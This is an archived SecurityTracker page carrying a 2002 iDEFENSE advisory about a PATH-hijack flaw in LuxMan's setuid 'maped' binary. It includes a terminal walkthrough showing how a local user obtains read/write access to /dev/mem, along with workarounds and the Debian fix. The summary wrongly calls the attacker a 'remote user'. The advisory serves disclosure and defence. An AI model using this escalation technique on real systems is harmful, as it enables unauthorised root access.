Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
LuxMan Game Software File Path Bug May Let Local Users Gain Root Access on the System
|
|
SecurityTracker Alert ID: 1005546 |
|
CVE Reference: CAN-2002-1245
(Links to External Site)
|
Date: Nov 6 2002
|
Impact: Disclosure of authentication information, Disclosure of system information, Modification of authentication information, Modification of system information, Root access via local system
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Advisory: iDEFENSE
|
Version(s): 0.41
|
Description: A vulnerability was reported in the LuxMan game software. A local user can gain access to /dev/mem, potentially yielding root access.
iDEFENSE reported that the 'maped' process, which is configured with set user id (setuid) root privileges, contains a flaw. The
code executes 'gzip' without specifying the full path to the executable. So, a local user can create a replacement gzip binary
and modify the PATH environment variable to cause the maped process to execute the user's replacement gzip binary.
Exploiting
this behavior, a local user can cause certain file operations to be performed with root privileges. A demonstration exploit transcript
that duplicates /dev/mem to a readable temporary file is provided in the Source Message. This demonstration exploit shows how a
local user might gain read or write access to critical memory contents. A local user could potentially view passwords or modify
kernel memory to gain root privileges on the system.
|
Impact: A remote user can cause certain file operations to be executed with root privileges. A remote user could gain read/write access to /dev/mem, potentially accessing critical memory contents that could lead to root access on the system.
|
Solution: Debian has released a fix for the version distributed with Debian Linux (a separate alert will be issued shortly covering the Debian
fix).
No information on an upstream fix was available at the time of this entry.
As a workaround, iDEFENSE has provided the
following options:
Option 1: Remove the LuxMan package.
Option 2: Remove the setuid bit from the maped binary by executing
the command "# chmod -s `which maped`".
|
Vendor URL: packages.debian.org/stable/games/luxman.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "David Endler" <dendler@idefense.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Wed, 6 Nov 2002 11:56:34 -0500
From: "David Endler" <dendler@idefense.com>
Subject: [VulnWatch] iDEFENSE Security Advisory 11.06.02: Non-Explicit Path Vulnerability in LuxMan
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 11.06.02:
http://www.idefense.com/advisory/11.06.02.txt
Non-Explicit Path Vulnerability in LuxMan
November 6, 2002
I. BACKGROUND
Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man.
More information about it is available at
http://packages.debian.org/stable/games/luxman.html.
II. DESCRIPTION
Maped is a setuid binary that belongs to LuxMan. It executes gzip
without using the full path. A local attacker can create an
exploit binary named gzip and have maped execute it by properly
modifying the path environment variable. The following is a
sample run and explanation of an exploit that will duplicate /dev/mem
to /tmp/mem:
First, the attacker sets the current working directory into the path
environment variable:
farmer@debian30:~$ export | grep PATH declare -x
PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ export | grep PATH declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
Second, the attacker compiles the exploit as a binary named gzip and
creates a fake archive:
farmer@debian30:~$ cc gzip.c -o gzip
farmer@debian30:~$ touch test.gz
Third, the attacker executes the maped binary:
farmer@debian30:~$ `which maped` test.gz
You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.
Using VGA driver.
svgalib 1.4.3
...
At this point, /dev/mem is being duplicated into /dev/tmp. The
descriptor to /dev/mem can be analyzed in a separate terminal:
farmer@debian30:~$ lsof | grep /dev/mem
gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem
farmer@debian30:~$ cd /proc/5197/fd/
farmer@debian30:~$ ls -l
total 0
lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem
It is clear that descriptor 5 is a read write descriptor to /dev/mem.
III. ANALYSIS
Any local user can launch this attack to gain read/write access to
/dev/mem. Such access can lead to local root compromise.
Exploitation is possible by scanning the file for fragments of the
master password file and modifying kernel memory to re-map
system calls.
IV. DETECTION
LuxMan 0.41, which is packaged and distributed with Debian Linux
3.0r0, is vulnerable. It is probable that the same LuxMan
version is vulnerable on other platforms as well.
V. WORKAROUND
Customers should consider one of the two following options:
Option 1: Remove the LuxMan package by issuing the command "# apt-get
remove luxman".
Option 2: Remove the setuid bit from the maped binary by executing
the command "# chmod -s `which maped`".
VI. VENDOR RESPONSE
The Debian Project has made available an updated LuxMan package that
fixes this vulnerability. More information should be
available in DSA-189 at http://www.debian.org/security/2002/dsa-189 .
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1245 to this
issue.
VIII. DISCLOSURE TIMELINE
10/03/2002 Issue disclosed to iDEFENSE
10/31/2002 Maintainer, Janos Lenart (ocsi@debian.org), and
security@debian.org notified
10/31/2002 iDEFENSE clients notified
11/02/2002 Responses received from ocsi@debian.org and Martin Schulze
(joey@infodrom.org)
11/06/2002 Public disclosure
IX. CREDIT
Texonet (http://www.texonet.com) discovered this vulnerability.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.
- -dave
David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A
iQA/AwUBPclF1UrdNYRLCswqEQLR5ACgyXFDjuXKXSkUb7pa4GGMEk+3GGsAn0Hf
feitp98Q3xxQr1bg1oMwIUBs
=WLLe
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
